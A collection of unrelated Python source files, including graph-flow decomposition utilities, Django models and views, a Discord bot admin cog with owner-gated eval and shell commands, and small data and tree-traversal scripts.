    def dst_nodes(self):
        # Second endpoint column of every edge.
        return self.edges[:, 1]
    @property
    def flow(self):
        # Per-edge flow values, or None when the graph has no flow attached.
        return self._flow
    @property
    def num_nodes(self):
        return self._num_nodes
    def num_vertices(self):
        # NOTE(review): unlike num_nodes this is a plain method (no @property),
        # so callers must invoke it as num_vertices().
        return self.num_nodes
    @property
    def num_edges(self):
        return self.edges.shape[0]
    def _edges2index(self, edges):
        # Scalar key for an edge: src * num_nodes + dst (unique for src <= dst < num_nodes).
        return edges[:, 0] * self.num_nodes + edges[:, 1]
    def edges2index(self, edges):
        """Return the row positions of the given (src, dst) pairs within ``self.edges``."""
        return self._indexed_edge[self._edges2index(edges)].to_numpy()
    def grad_matrix(self):
        """Edge-by-node signed incidence ('gradient') matrix in CSR form:
        row e holds +1 at dst(e) and -1 at src(e)."""
        columns = np.concatenate((self.dst_nodes, self.src_nodes), axis=0)
        values = np.concatenate((np.ones(self.num_edges), -np.ones(self.num_edges)), axis=0)
        rows = np.concatenate((np.arange(self.num_edges), np.arange(self.num_edges)))
        grad_matrix = sp.coo_matrix((values, (rows, columns)), shape=(self.num_edges, self.num_nodes)).tocsr()
        return grad_matrix
    def split_train_val_test_filters(self,
                                     desired_split=(0.7, 0.2, 0.1),
                                     required_train: Optional[np.ndarray] = None,
                                     required_val: Optional[np.ndarray] = None,
                                     required_test: Optional[np.ndarray] = None
                                     ) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:
        """Randomly split the edges into boolean train/val/test masks.

        A random spanning tree is always forced into the train split so the
        train graph stays connected on the spanned component; ``required_*``
        masks pre-assign edges to a split.

        NOTE(review): with a degenerate split such as (1, 0, 0), the val/test
        ratio computed below divides by zero — confirm callers always request
        a non-empty val or test share.
        """
        # Turn the ratios into absolute counts (missing entries padded with 0).
        num_train, num_val, num_test = self.num_edges * np.concatenate(
            (np.asarray(desired_split)[:3] / np.sum(desired_split),
             np.zeros(max(0, 3 - len(desired_split)))))
        num_val = int(num_val)
        num_test = int(num_test)
        # Train absorbs whatever integer truncation of val/test left over.
        num_train = self.num_edges - num_val - num_test
        train_filter = np.zeros(self.num_edges, dtype=bool) if required_train is None else required_train
        val_filter = np.zeros(self.num_edges, dtype=bool) if required_val is None else required_val
        test_filter = np.zeros(self.num_edges, dtype=bool) if required_test is None else required_test
        # Force a random spanning tree into the train split.
        tree_edges = self.random_min_spanning_tree()
        tree_indices = self.edges2index(tree_edges)
        train_filter[tree_indices] = True
        # Shuffle the edges not yet assigned to any split.
        remaining_edge_indices = np.random.permutation(
            np.logical_not(train_filter | val_filter | test_filter).nonzero()[0]
        )
        if len(remaining_edge_indices) > 0:
            # Top up train to its target size first.
            current_num_train = int(train_filter.sum().item())
            num_additional_train_edges = max(num_train - current_num_train, 0)
            train_filter[remaining_edge_indices[:num_additional_train_edges]] = True
            remaining_edge_indices = remaining_edge_indices[num_additional_train_edges:]
            # Split the leftovers between val and test in the requested ratio.
            num_val = int((float(num_val) / (num_val + num_test)) * len(remaining_edge_indices))
            num_additional_val = max(num_val - int(val_filter.sum().item()), 0)
            val_filter[remaining_edge_indices[:num_additional_val]] = True
            remaining_edge_indices = remaining_edge_indices[num_additional_val:]
            test_filter[remaining_edge_indices] = True
        return train_filter, val_filter, test_filter
    def split_train_val_test_edges(self,
                                   desired_split=(0.7, 0.2, 0.1),
                                   required_train: Optional[np.ndarray] = None,
                                   required_val: Optional[np.ndarray] = None,
                                   required_test: Optional[np.ndarray] = None
                                   ) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:
        """Like :meth:`split_train_val_test_filters`, but returns edge arrays."""
        train_filter, val_filter, test_filter = self.split_train_val_test_filters(
            desired_split=desired_split, required_train=required_train,
            required_val=required_val, required_test=required_test
        )
        train_edges = self.edges[train_filter]
        val_edges = self.edges[val_filter]
        test_edges = self.edges[test_filter]
        return train_edges, val_edges, test_edges
    def split_train_val_test_graphs(self,
                                    desired_split=(0.7, 0.2, 0.1),
                                    required_train: Optional[np.ndarray] = None,
                                    required_val: Optional[np.ndarray] = None,
                                    required_test: Optional[np.ndarray] = None
                                    ) -> Tuple['Graph', 'Graph', 'Graph']:
        """Like :meth:`split_train_val_test_filters`, but returns three Graphs
        (carrying the corresponding flow slices when flow is present)."""
        train_filter, val_filter, test_filter = self.split_train_val_test_filters(
            desired_split=desired_split, required_train=required_train,
            required_val=required_val, required_test=required_test
        )
        train_edges = self.edges[train_filter]
        val_edges = self.edges[val_filter]
        test_edges = self.edges[test_filter]
        if self.flow is not None:
            train_graph = Graph(self.num_nodes, train_edges, flow=self.flow[train_filter])
            val_graph = Graph(self.num_nodes, val_edges, flow=self.flow[val_filter])
            test_graph = Graph(self.num_nodes, test_edges, flow=self.flow[test_filter])
        else:
            train_graph = Graph(self.num_nodes, train_edges)
            val_graph = Graph(self.num_nodes, val_edges)
            test_graph = Graph(self.num_nodes, test_edges)
        return train_graph, val_graph, test_graph
    def random_min_spanning_tree(self):
        """Return the edges of a uniformly perturbed minimum spanning tree:
        random weights in (0, 1) make the selected tree random."""
        random_weights = np.random.rand(self.num_edges)
        adj = sp.coo_matrix(
            (random_weights, (self.src_nodes, self.dst_nodes)), shape=(self.num_nodes, self.num_nodes)
        ).tocsr()
        min_tree = sp.csgraph.minimum_spanning_tree(adj).tocoo()
        return np.stack((min_tree.row, min_tree.col), axis=1).astype(np.int64)
    def __repr__(self):
        return '{}({} nodes, {} edges)'.format(self.__class__.__name__, self.num_nodes, self.num_edges)
# ========================================================================================
# =========================== Generate random networks ==================================
# ========================================================================================
def complete_graph(num_nodes: int):
    """Build a :class:`Graph` containing every pair (i, j) with i < j."""
    # A strictly-upper-triangular ones matrix has one entry per node pair.
    upper = sp.triu(np.ones((num_nodes, num_nodes)), k=1, format='coo')
    pair_array = np.stack((upper.row, upper.col), axis=1)
    return Graph(num_nodes=num_nodes, edges=pair_array)
def sample_noise(num_samples: int, dim: int, df: Union[str, float]):
    """Draw a (num_samples, dim) float32 noise matrix.

    Gaussian noise when ``df == 'normal'`` or ``df > 10`` (the t distribution
    is then close to normal); otherwise Student-t noise with ``df`` degrees
    of freedom.
    """
    if df == 'normal' or df > 10:
        draws = stats.norm.rvs(size=(num_samples, dim))
    else:
        draws = stats.t.rvs(df=df, size=(num_samples, dim))
    return draws.astype(np.float32)
def add_sheaf_flow(graph: Graph, sheaf_flow_model):
    """Evaluate ``sheaf_flow_model`` on every edge of ``graph``, store the
    resulting flow on the graph, and return ``(graph, summary)`` where the
    summary dict also contains the norms of the gradient/harmonic parts.
    """
    src, dst = graph.src_nodes, graph.dst_nodes
    device = sheaf_flow_model.node_embeddings.weight.device
    src_t = torch.from_numpy(src).to(device)
    dst_t = torch.from_numpy(dst).to(device)
    with torch.no_grad():
        predicted = sheaf_flow_model(src_t, dst_t)
    graph.set_flow(predicted.detach().cpu().numpy())
    # Hodge-style decomposition of the stored flow.
    grad_part, harmonic_part = decompose_flow(src, dst, graph.flow, graph.num_nodes)
    summary = flow_summary(graph.flow)
    summary.update({
        'grad_norm': np.linalg.norm(grad_part),
        'harmonic_norm': np.linalg.norm(harmonic_part),
    })
    return graph, summary
def flow_summary(flow, cutoff: float = 1e-10):
    """Return summary statistics of an edge-flow vector.

    ``cutoff`` bounds magnitudes away from zero before taking log10 so exact
    zeros do not produce -inf.
    """
    abs_flow = np.abs(flow)
    return {
        'num_edges': len(flow),
        'flow_ratio_p': (np.sign(flow) > 0).sum() / len(flow),
        'flow_mean_mag': np.mean(np.log10(np.maximum(abs_flow, cutoff))),
        'flow_mean_value': np.mean(abs_flow),
        'flow_max_value': np.max(abs_flow),
        'flow_std': np.std(flow),
        'flow_norm': np.linalg.norm(flow),
    }
def compute_indicence_matrix(source_nodes, target_nodes, num_nodes, num_edges):
    """Build the (num_edges x num_nodes) signed incidence matrix in CSR form.

    Row e carries +1 in the column of the edge's target node and -1 in the
    column of its source node.
    """
    edge_ids = np.arange(num_edges)
    rows = np.concatenate((edge_ids, edge_ids))
    cols = np.concatenate((target_nodes, source_nodes), axis=0)
    vals = np.concatenate((np.ones(num_edges), -np.ones(num_edges)), axis=0)
    return sp.coo_matrix((vals, (rows, cols)), shape=(num_edges, num_nodes)).tocsr()
def compute_flow_potentials(source_nodes, target_nodes, flow, num_nodes, return_indicence=False):
    """Least-squares node potentials whose discrete gradient best matches ``flow``.

    When ``return_indicence`` is true, also returns the incidence matrix used
    for the solve.
    """
    incidence = compute_indicence_matrix(source_nodes, target_nodes, num_nodes, len(flow))
    # Only the solution vector is needed; lsqr's diagnostics are discarded.
    potentials = sp.linalg.lsqr(incidence, flow)[0]
    if return_indicence:
        return potentials, incidence
    return potentials
def decompose_flow(source_nodes, target_nodes, flow, num_nodes):
    """Split ``flow`` into a gradient component and its harmonic remainder."""
    potentials, incidence = compute_flow_potentials(
        source_nodes, target_nodes, flow, num_nodes, return_indicence=True)
    gradient_part = incidence.dot(potentials)
    return gradient_part, flow - gradient_part
def decompose_flow_normalized(source_nodes, target_nodes, flow, num_nodes):
    """Like :func:`decompose_flow`, but returns unit-norm components along
    with their original norms.

    NOTE(review): a zero-norm component (e.g. a purely gradient flow) divides
    by zero here — confirm callers guarantee both parts are non-zero.
    """
    grad_part, harmonic_part = decompose_flow(source_nodes, target_nodes, flow, num_nodes)
    grad_norm = np.linalg.norm(grad_part)
    harmonic_norm = np.linalg.norm(harmonic_part)
    return grad_part / grad_norm, grad_norm, harmonic_part / harmonic_norm, harmonic_norm
def sample_gmm_from_mu(n, mu, std):
    """Draw ``n`` samples from an equal-weight spherical GMM with means ``mu``.

    Returns ``(samples, component_ids)``.
    """
    num_components, _ = mu.shape
    per_component = int(np.ceil(n / num_components))
    points = np.repeat(mu, per_component, 0)
    points += std * np.random.randn(*points.shape)
    labels = np.repeat(np.arange(num_components), per_component)
    # Shuffle and keep exactly n samples.
    keep = np.random.permutation(points.shape[0])[:n]
    return points[keep, :], labels[keep]
def sample_t_from_mu(n, mu, std):
    """Draw ``n`` samples around means ``mu`` with heavy-tailed t(df=2) noise
    scaled by ``std``.  Returns ``(samples, component_ids)``.
    """
    num_components, _ = mu.shape
    per_component = int(np.ceil(n / num_components))
    points = np.repeat(mu, per_component, 0)
    points += std * stats.t(df=2).rvs(size=points.shape)
    labels = np.repeat(np.arange(num_components), per_component)
    # Shuffle and keep exactly n samples.
    keep = np.random.permutation(points.shape[0])[:n]
    return points[keep, :], labels[keep]
def sample_t_from_mu_and_ids(mu, std, component_ids):
    """Sample one point per entry of ``component_ids``, centred on the row of
    ``mu`` for that component, with t(df=2) noise scaled by ``std``."""
    # np.unique's inverse maps each id to its position among the sorted ids.
    _, positions = np.unique(component_ids, return_inverse=True)
    points = mu[positions, :]
    points += std * stats.t(df=2).rvs(size=points.shape)
    return points, component_ids
def sample_gmm_from_mu_and_ids(mu, std, component_ids):
    """Gaussian counterpart of sample_t_from_mu_and_ids: one spherical-normal
    sample per entry of ``component_ids``."""
    # np.unique's inverse maps each id to its position among the sorted ids.
    _, positions = np.unique(component_ids, return_inverse=True)
    points = mu[positions, :]
    points += std * np.random.randn(*points.shape)
    return points, component_ids
def sample_2modes_2d(n, std, num_sigma=6, num_cross_dims=2, component_ids=None):
    """Sample a two-mode 2-D Gaussian mixture whose modes are separated by
    ``num_sigma`` standard deviations along ``num_cross_dims`` axes
    (0 places both modes at the origin).

    When ``component_ids`` is given, one sample is drawn per id instead of
    drawing ``n`` fresh ones.
    """
    half_sep = num_sigma * std / 2
    if num_cross_dims > 1:
        mode_centers = np.array([[half_sep, half_sep], [-half_sep, -half_sep]])
    elif num_cross_dims == 1:
        mode_centers = np.array([[half_sep, 0], [-half_sep, 0]])
    else:
        mode_centers = np.zeros((2, 2))
    if component_ids is None:
        samples, component_ids = sample_gmm_from_mu(n, mode_centers, std)
    else:
        samples, _ = sample_gmm_from_mu_and_ids(mode_centers, std, component_ids)
    return samples, component_ids
def sample_trade_scenario(scenario: str, num_nodes):
    """Sample node embeddings and gate vectors for a synthetic trade scenario.

    ``scenario`` has the form ``'<emb>:<gates>'``.  Returns
    ``(emb_samples, gates_samples, emb_component_ids, gates_component_ids)``.
    """
    scenarios = {'0:0', '0:1', '1:0', '1:1', '2:2'}
    if scenario not in scenarios:
        raise RuntimeError(f"Invalid scenario {scenario}")
    emb_scenario, gates_scenario = scenario.split(':')
    # --- embeddings: heavy-tailed clusters around scenario-specific means ---
    emb_std = 1.
    if emb_scenario == '0':
        emb_mu = np.array([[-100., -20.], [100., 20.]])
    elif emb_scenario == '1':
        emb_mu = np.array([[-100., 20.], [100., -20.]])
    elif emb_scenario == '2':
        emb_mu = np.array([[100., 100.], [0., 0.], [0., -50]])
    else:
        raise RuntimeError(f"Invalid scenario {scenario}")
    emb_samples, emb_comp_ids = sample_t_from_mu(num_nodes, emb_mu, emb_std)
    # --- gates ---
    gates_std = 0.01
    if gates_scenario == '0':
        gates_mu = np.array([[-1., -1.]])
        gates_samples, gates_comp_ids = sample_gmm_from_mu(num_nodes, gates_mu, gates_std)
        # Promote a random half of the nodes to "traders": boost one of the
        # two gate dimensions for each half of the trader set.
        num_traders = int(0.5 * num_nodes)
        traders = np.random.choice(num_nodes, size=num_traders, replace=False)
        traders1 = traders[:num_traders // 2]
        traders2 = traders[num_traders // 2:]
        gates_samples[traders1, 0] = 4. * (np.ones((len(traders1),)) + gates_std * np.random.randn(len(traders1)))
        gates_samples[traders2, 1] = 4. * (np.ones((len(traders2),)) + gates_std * np.random.randn(len(traders2)))
    elif gates_scenario == '2':
        gates_mu = np.array([[4., 4.], [0., -5.], [-5., 1.]])
        gates_samples, gates_comp_ids = sample_t_from_mu_and_ids(gates_mu, gates_std, emb_comp_ids)
    else:
        # BUG FIX: gates scenario '1' is accepted by the whitelist above
        # ('0:1', '1:1') but had no branch, so those scenarios crashed with
        # UnboundLocalError on gates_samples.  Fail loudly with a clear
        # message until its semantics are defined.
        raise NotImplementedError(
            f"gates scenario {gates_scenario!r} is not implemented")
    return emb_samples, gates_samples, emb_comp_ids, gates_comp_ids
def sample_scenario(n, scenario,
                    num_emb_cross_dim,
                    emb_std, gates_std,
                    emb_num_sigma=16, gates_num_sigma=16):
    """Sample node embeddings plus gates under an 'inter' or 'intra' scenario.

    'inter': gates are drawn with coincident modes but keep the node
    component ids; 'intra': gates form their own two-mode structure,
    independent of the embedding clusters.
    """
    node_embeddings, node_comp_ids = sample_2modes_2d(
        n, std=emb_std, num_sigma=emb_num_sigma, num_cross_dims=num_emb_cross_dim)
    if scenario == "inter":
        gates, gate_ids = sample_2modes_2d(
            n, std=gates_std, num_sigma=gates_num_sigma,
            num_cross_dims=0, component_ids=node_comp_ids)
    elif scenario == "intra":
        gates, gate_ids = sample_2modes_2d(
            n, std=gates_std, num_sigma=gates_num_sigma,
            num_cross_dims=num_emb_cross_dim, component_ids=None)
    else:
        raise ValueError(f"Unknown scenario {scenario}")
    return node_embeddings, node_comp_ids, gates, gate_ids
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Auto-generated migration: relax the ``Estimaciones`` foreign key on
    ``detalleproductoestimacion`` to allow blank/null values."""
    dependencies = [
        ('proyectos', '0020_auto_20150813_1815'),
    ]
    operations = [
        migrations.AlterField(
            model_name='detalleproductoestimacion',
            name='Estimaciones',
            field=models.ForeignKey(blank=True, to='proyectos.Estimaciones', null=True),
        ),
    ]
|
from onegov.core.orm.abstract import AdjacencyList
from onegov.core.orm.abstract import MoveDirection
from onegov.core.orm.mixins import ContentMixin
from onegov.core.orm.mixins import meta_property
from onegov.core.orm.mixins import TimestampMixin
from sqlalchemy import Boolean
from sqlalchemy import Column
from sqlalchemy import or_
from sqlalchemy_utils import observes
from sqlalchemy.orm import object_session
class Organization(AdjacencyList, ContentMixin, TimestampMixin):
    """ Defines an organization for official notices.
    Although the categories are defined as a flexible adjacency list, we
    currently use it only as a two-stage adjacency list key-value list
    (name-title).
    """
    __tablename__ = 'gazette_organizations'
    #: True, if this organization is still in use.
    active = Column(Boolean, nullable=True)
    #: Optional external identifier stored in the meta column.
    external_name = meta_property('external_name')
    def notices(self):
        """ Returns a query to get all notices related to this category. """
        from onegov.gazette.models.notice import GazetteNotice  # circular
        notices = object_session(self).query(GazetteNotice)
        # Notices store their organizations as an HSTORE keyed by name.
        notices = notices.filter(
            GazetteNotice._organizations.has_key(self.name)  # noqa
        )
        return notices
    @property
    def in_use(self):
        """ True, if the organization is used by any notice. """
        if self.notices().first():
            return True
        return False
    @observes('title')
    def title_observer(self, title):
        """ Propagates title changes to the notices referencing this
        organization (only those whose stored text is stale). """
        from onegov.gazette.models.notice import GazetteNotice  # circular
        notices = self.notices()
        notices = notices.filter(
            or_(
                GazetteNotice.organization.is_(None),
                GazetteNotice.organization != title
            )
        )
        for notice in notices:
            notice.organization = title
class OrganizationMove:
    """ Represents a single move of an adjacency list item. """
    def __init__(self, session, subject_id, target_id, direction):
        self.session = session
        self.subject_id = subject_id
        self.target_id = target_id
        self.direction = direction
    @classmethod
    def for_url_template(cls):
        """ Returns an instance whose ids and direction are URL placeholders. """
        return cls(
            session=None,
            subject_id='{subject_id}',
            target_id='{target_id}',
            direction='{direction}'
        )
    def execute(self):
        """ Performs the move, but only when subject and target both exist,
        differ, and share the same parent. """
        from onegov.gazette.collections import OrganizationCollection
        collection = OrganizationCollection(self.session)
        subject = collection.by_id(self.subject_id)
        target = collection.by_id(self.target_id)
        # Guard clauses replace the original nested conditionals.
        if not subject or not target or subject == target:
            return
        if subject.parent_id != target.parent_id:
            return
        OrganizationCollection(self.session).move(
            subject=subject,
            target=target,
            direction=getattr(MoveDirection, self.direction)
        )
|
import io
import copy
import random
import asyncio
import textwrap
import traceback
from typing import Union, Sequence
from contextlib import redirect_stdout
import discord
import aiosqlite
from discord.ext import commands
from potato_bot.bot import Bot
from potato_bot.cog import Cog
from potato_bot.utils import run_process_shell
from potato_bot.checks import is_owner, is_techadmin
class TechAdmin(Cog):
    """Commands for technical staff"""
    # Truncate SQL cell values beyond this many characters.
    SQL_VALUE_LEN_CAP = 30
    # Never send more than this many paginator pages per command.
    PAGINATOR_PAGES_CAP = 5
    async def cog_check(self, ctx):
        # Every command in this cog requires the techadmin check to pass.
        return await is_techadmin().predicate(ctx)
    @commands.command()
    async def load(self, ctx, module: str):
        """Load extension"""
        self.bot.load_extension(f"potato_bot.cogs.{module}")
        await ctx.ok()
    @commands.command()
    async def unload(self, ctx, module: str):
        """Unload extension"""
        self.bot.unload_extension(f"potato_bot.cogs.{module}")
        await ctx.ok()
    @commands.command()
    async def reload(self, ctx, module: str):
        """Reload extension"""
        self.bot.reload_extension(f"potato_bot.cogs.{module}")
        await ctx.ok()
    # https://github.com/Rapptz/RoboDanny/blob/715a5cf8545b94d61823f62db484be4fac1c95b1/cogs/admin.py#L422
    @commands.command(aliases=["sudo"])
    @is_owner()
    async def runas(
        self, ctx, user: Union[discord.Member, discord.User], *, command: str
    ):
        """Run command as other user"""
        # Clone the invoking message and rewrite author/content so the
        # command pipeline processes it as if `user` had sent it.
        msg = copy.copy(ctx.message)
        msg.channel = ctx.channel
        msg.author = user
        msg.content = f"{ctx.prefix}{command}"
        new_ctx = await self.bot.get_context(msg, cls=type(ctx))
        await self.bot.invoke(new_ctx)
        await ctx.ok()
    def _make_paginator(self, text: str, prefix: str = "```") -> commands.Paginator:
        """Split `text` into paginator pages, hard-wrapping lines that exceed
        the per-page size limit."""
        paginator = commands.Paginator(prefix=prefix)
        # https://github.com/Rapptz/discord.py/blob/5c868ed871184b26a46319c45a799c190e635892/discord/ext/commands/help.py#L125
        max_page_size = (
            paginator.max_size - len(paginator.prefix) - len(paginator.suffix) - 2
        )
        def wrap_with_limit(text: str, limit: int):
            # Yield chunks no longer than `limit`, breaking at newlines when
            # possible and mid-line otherwise.
            limit -= 1
            line_len = 0
            for i, c in enumerate(text):
                if c == "\n" or line_len > limit:
                    yield text[i - line_len : i]
                    line_len = 0
                else:
                    line_len += 1
            # Flush the trailing partial line, if any.
            if line_len != 0:
                yield text[-line_len - 1 :]
        for line in wrap_with_limit(text, max_page_size):
            paginator.add_line(line)
        return paginator
    async def _send_paginator(self, ctx, paginator: commands.Paginator):
        """Send paginator pages, capped to the last PAGINATOR_PAGES_CAP pages."""
        if len(paginator.pages) > self.PAGINATOR_PAGES_CAP:
            pages = paginator.pages[-self.PAGINATOR_PAGES_CAP :]
            await ctx.send(
                f"Sending last **{len(pages)}** of **{len(paginator.pages)}** pages"
            )
        else:
            pages = paginator.pages
        for page in pages:
            await ctx.send(page)
    @commands.command()
    async def eval(self, ctx, *, program: str):
        """
        Evaluate code inside bot, with async support
        Has convenience shortcuts like
        - ctx
        - discord
        To get result you can either print or return object.
        """
        if program.startswith("```") and program.endswith("```"):
            # strip codeblock
            program = program[:-3]
            program = "\n".join(program.split("\n")[1:])
        async with ctx.typing():
            result = await self._eval(ctx, program)
            # Never echo the bot token back into chat.
            result = result.replace(self.bot.http.token, "TOKEN_LEAKED")
            paginator = self._make_paginator(result, prefix="```py\n")
            await self._send_paginator(ctx, paginator)
    @commands.command()
    async def exec(self, ctx, *, arguments: str):
        """Execute shell command"""
        async with ctx.typing():
            paginator = await self._exec(ctx, arguments)
            await self._send_paginator(ctx, paginator)
    @commands.command()
    async def sql(self, ctx, *, program: str):
        """Run SQL command against bot database"""
        async with ctx.typing():
            async with self.bot.db.cursor() as cur:
                await cur.execute(program)
                result = await cur.fetchall()
            if not result:
                # No rows came back (e.g. UPDATE/INSERT): just acknowledge.
                return await ctx.ok()
            paginator = await self._sql_table(result)
            await self._send_paginator(ctx, paginator)
    async def _eval(self, ctx, program) -> str:
        """Compile `program` into an async function and run it, returning a
        string with captured stdout, the return value and/or the traceback."""
        # copied from https://github.com/Fogapod/KiwiBot/blob/49743118661abecaab86388cb94ff8a99f9011a8/modules/owner/module_eval.py
        # (originally copied from R. Danny bot)
        glob = {
            "self": self,
            "bot": self.bot,
            "ctx": ctx,
            "message": ctx.message,
            "guild": ctx.guild,
            "author": ctx.author,
            "channel": ctx.channel,
            "asyncio": asyncio,
            "random": random,
            "discord": discord,
        }
        fake_stdout = io.StringIO()
        # Wrap user code in an async function so `await`/`return` are legal.
        to_compile = "async def func():\n" + textwrap.indent(program, " ")
        try:
            exec(to_compile, glob)
        except Exception as e:
            # Compile-time error in the supplied code.
            return f"{e.__class__.__name__}: {e}"
        func = glob["func"]
        try:
            with redirect_stdout(fake_stdout):
                returned = await func()
        except asyncio.CancelledError:
            # Never swallow task cancellation.
            raise
        except Exception:
            return f"{fake_stdout.getvalue()}{traceback.format_exc()}"
        else:
            from_stdout = fake_stdout.getvalue()
            if returned is None:
                if from_stdout:
                    return f"{from_stdout}"
                return "Evaluated"
            else:
                return f"{from_stdout}{returned}"
    async def _exec(self, ctx, arguments: str) -> commands.Paginator:
        """Run a shell command and wrap its output in a paginator."""
        stdout, stderr = await run_process_shell(arguments)
        if stderr:
            result = f"STDERR:\n{stderr}\n{stdout}"
        else:
            result = stdout
        # Never echo the bot token back into chat.
        result = result.replace(self.bot.http.token, "TOKEN_LEAKED")
        return self._make_paginator(result, prefix="```bash\n")
    async def _sql_table(self, result: Sequence[aiosqlite.Row]) -> commands.Paginator:
        """Render rows as an ASCII table; column widths grow to the widest
        value but are capped at SQL_VALUE_LEN_CAP."""
        columns = result[0].keys()
        col_widths = [len(c) for c in columns]
        for row in result:
            for i, column in enumerate(columns):
                col_widths[i] = min(
                    (
                        max((col_widths[i], len(str(row[column])))),
                        self.SQL_VALUE_LEN_CAP,
                    )
                )
        header = " | ".join(
            f"{column:^{col_widths[i]}}" for i, column in enumerate(columns)
        )
        separator = "-+-".join("-" * width for width in col_widths)
        def sanitize_value(value):
            # Keep each value on one table row and within the width cap.
            value = str(value).replace("\n", "\\n")
            if len(value) > self.SQL_VALUE_LEN_CAP:
                value = f"{value[:self.SQL_VALUE_LEN_CAP - 2]}.."
            return value
        paginator = commands.Paginator()
        paginator.add_line(header)
        paginator.add_line(separator)
        for row in result:
            paginator.add_line(
                " | ".join(
                    f"{sanitize_value(value):<{col_widths[i]}}"
                    for i, value in enumerate(row)
                )
            )
        return paginator
def setup(bot: Bot):
    """Extension entry point: attach the TechAdmin cog to the bot."""
    cog = TechAdmin(bot)
    bot.add_cog(cog)
|
# Generate a 3-feature blob dataset, save it to CSV and render a 3-D scatter plot.
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
sns.set(style="ticks")
from sklearn.datasets import make_blobs
# Synthetic data: 600 points, 4 centers, 3 features (fixed seed for reproducibility).
X, y = make_blobs(n_samples=600, centers=4, n_features=3, random_state=42, cluster_std = 2)
df = pd.DataFrame(X)
df.columns = ["col_1", "col_2", "col_3"]
df["Label"] = y
df.to_csv("make_blobs_data_3D.csv")
# Importing Axes3D registers the '3d' projection on older matplotlib versions.
from mpl_toolkits.mplot3d import Axes3D
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
# Color each point by its cluster label.
ax.scatter(df["col_1"], df["col_2"], df["col_3"], c = df["Label"], cmap='Accent', s=5)
ax.set_xlabel('X Axis')
ax.set_ylabel('Y Axis')
ax.set_zlabel('Z Axis')
# Save before show(): show() may clear the current figure.
plt.savefig("blobs_scatter_3D.png")
plt.show()
|
#! usr/bin/python3
from typing import List

from treenode import TreeNode
def levelOrder(root: "TreeNode") -> List[List[int]]:
    """Return the node values of a binary tree grouped level by level (BFS).

    An empty tree yields an empty list.  Assumes TreeNode exposes the usual
    ``val``/``left``/``right`` attributes — TODO confirm against treenode.
    """
    from collections import deque  # local import: module deps stay unchanged
    if root is None:
        return []
    levels = []
    queue = deque([root])
    while queue:
        level_vals = []
        # Drain exactly the nodes that belong to the current level.
        for _ in range(len(queue)):
            node = queue.popleft()
            level_vals.append(node.val)
            if node.left is not None:
                queue.append(node.left)
            if node.right is not None:
                queue.append(node.right)
        levels.append(level_vals)
    return levels
|
import sys
from abc import ABC, abstractmethod
from typing import Callable, Dict
from colosseum.ipc import FileNoComs
# File descriptors of the pipes shared with the parent process: stdout is the
# write channel, stdin the read channel.
pipeout_fileno = sys.stdout.fileno()
pipein_fileno = sys.stdin.fileno()
# Process-wide communication endpoint used by log()/get_input() and Bot.
# NOTE(review): the first positional argument presumably selects a mode of
# FileNoComs (e.g. blocking/ownership) — confirm against colosseum.ipc.
_coms = FileNoComs(
    True,
    read_fileno=pipein_fileno,
    write_fileno=pipeout_fileno
)
def log(*args, **kwargs):
    """
    Forward a log message to the parent process over the IPC channel.

    The standard print function cannot be used because stdout carries the
    inter-process protocol.  The parent only services the request when it
    expects a message from this process, i.e. during this bot's turn.
    """
    payload = {'args': args, 'kwargs': kwargs}
    _coms.send(log=payload)
def get_input(*args, **kwargs):
    """
    Request a line of input from the parent process over the IPC channel.

    The standard input function cannot be used because stdin carries the
    inter-process protocol.  The parent only services the request when it
    expects a message from this process, i.e. during this bot's turn.
    """
    _coms.send(input={'args': args, 'kwargs': kwargs})
    reply = _coms.recv()
    return reply.get('s', '')
class Bot(ABC):
    """
    Base class for a bot.

    NOTE(review): the constructor never returns — it immediately enters the
    blocking dispatch loop, servicing parent-process commands until a 'stop'
    message arrives.
    """
    def __init__(self, tracker_type:type):
        """
        params:
            tracker_type:type - The type of the associated GameTracker
        """
        self._tracker_type = tracker_type
        # Built-in protocol commands; subclasses can extend the table via
        # _register_commands() (only effective before this loop starts).
        self._commands = {'stop': self._stop, 'new_game': self._new_game,
                          'update': self._update, 'your_turn': self._take_turn}
        # Blocking dispatch loop: each message maps command name -> params.
        while(True):
            msg = _coms.recv()
            for command, params in msg.items():
                # I cannot use the walrus operator since this might run on
                # earlier versions of python
                target = self._commands.get(command, None)
                if target is not None:
                    target(**params)
    def _register_commands(self, commands:Dict[str, Callable]):
        # Merge subclass-provided command handlers into the dispatch table.
        self._commands.update(commands)
    def _register_command(self, command:str, target:Callable):
        # Convenience wrapper for registering a single handler.
        self._register_commands({command: target})
    def _stop(self, **kwargs):
        # Close the IPC channel and terminate with the requested exit id.
        _coms.close()
        exit(kwargs.get('eid', 0))
    def _update(self, **kwargs):
        # Forward state changes to the game tracker, then notify the subclass.
        self._game.update(**kwargs)
        self.update()
    def _take_turn(self, **kwargs):
        # Ask the subclass for a move and send it back to the parent.
        response = self.take_turn()
        _coms.send(**response)
    def _new_game(self, **game_params):
        # (Re)create the game tracker and let the subclass reset itself.
        self._game = self._tracker_type(**game_params)
        self.new_game()
    @property
    def game(self):
        # Current game tracker instance (set by _new_game).
        return self._game
    @abstractmethod
    def take_turn(self):
        """
        The logic for the bot to take their turn
        returns:
            The move that the bot wishes to make
        """
        ...
    @abstractmethod
    def update(self):
        """Hook invoked after the game tracker has been updated."""
        ...
    @abstractmethod
    def new_game(self):
        """
        A 'reset' method to start a new game. This does not have to reset the
        bot to its original state. The reason to use a resetter over
        re-instantiating or re-initializing the object is to allow for
        'remembering' behavior.
        """
        ...
from django.shortcuts import render, redirect
from django.views.generic.edit import CreateView
from django.views.generic import ListView, DetailView
from django.views.generic.base import View
from movie.models import Movie
from movie.forms import ReviewForm
class MovieView(ListView):
    """List all movies that are not drafts."""
    model = Movie
    queryset = Movie.objects.filter(draft=False)
    def get_context_data(self, **kwargs):
        """Add the page title to the template context."""
        # Python 3 zero-argument super() replaces super(MovieView, self).
        context = super().get_context_data(**kwargs)
        context['title'] = 'Главная'
        return context
class MovieDetailView(DetailView):
    """Detail page for a single movie, looked up by its ``url`` slug field."""
    model = Movie
    slug_field = 'url'
class AddReview(View):
    """Handle review form submissions for a movie."""
    def post(self, request, pk):
        form = ReviewForm(request.POST)
        movie = Movie.objects.get(id=pk)
        if form.is_valid():
            form = form.save(commit=False)
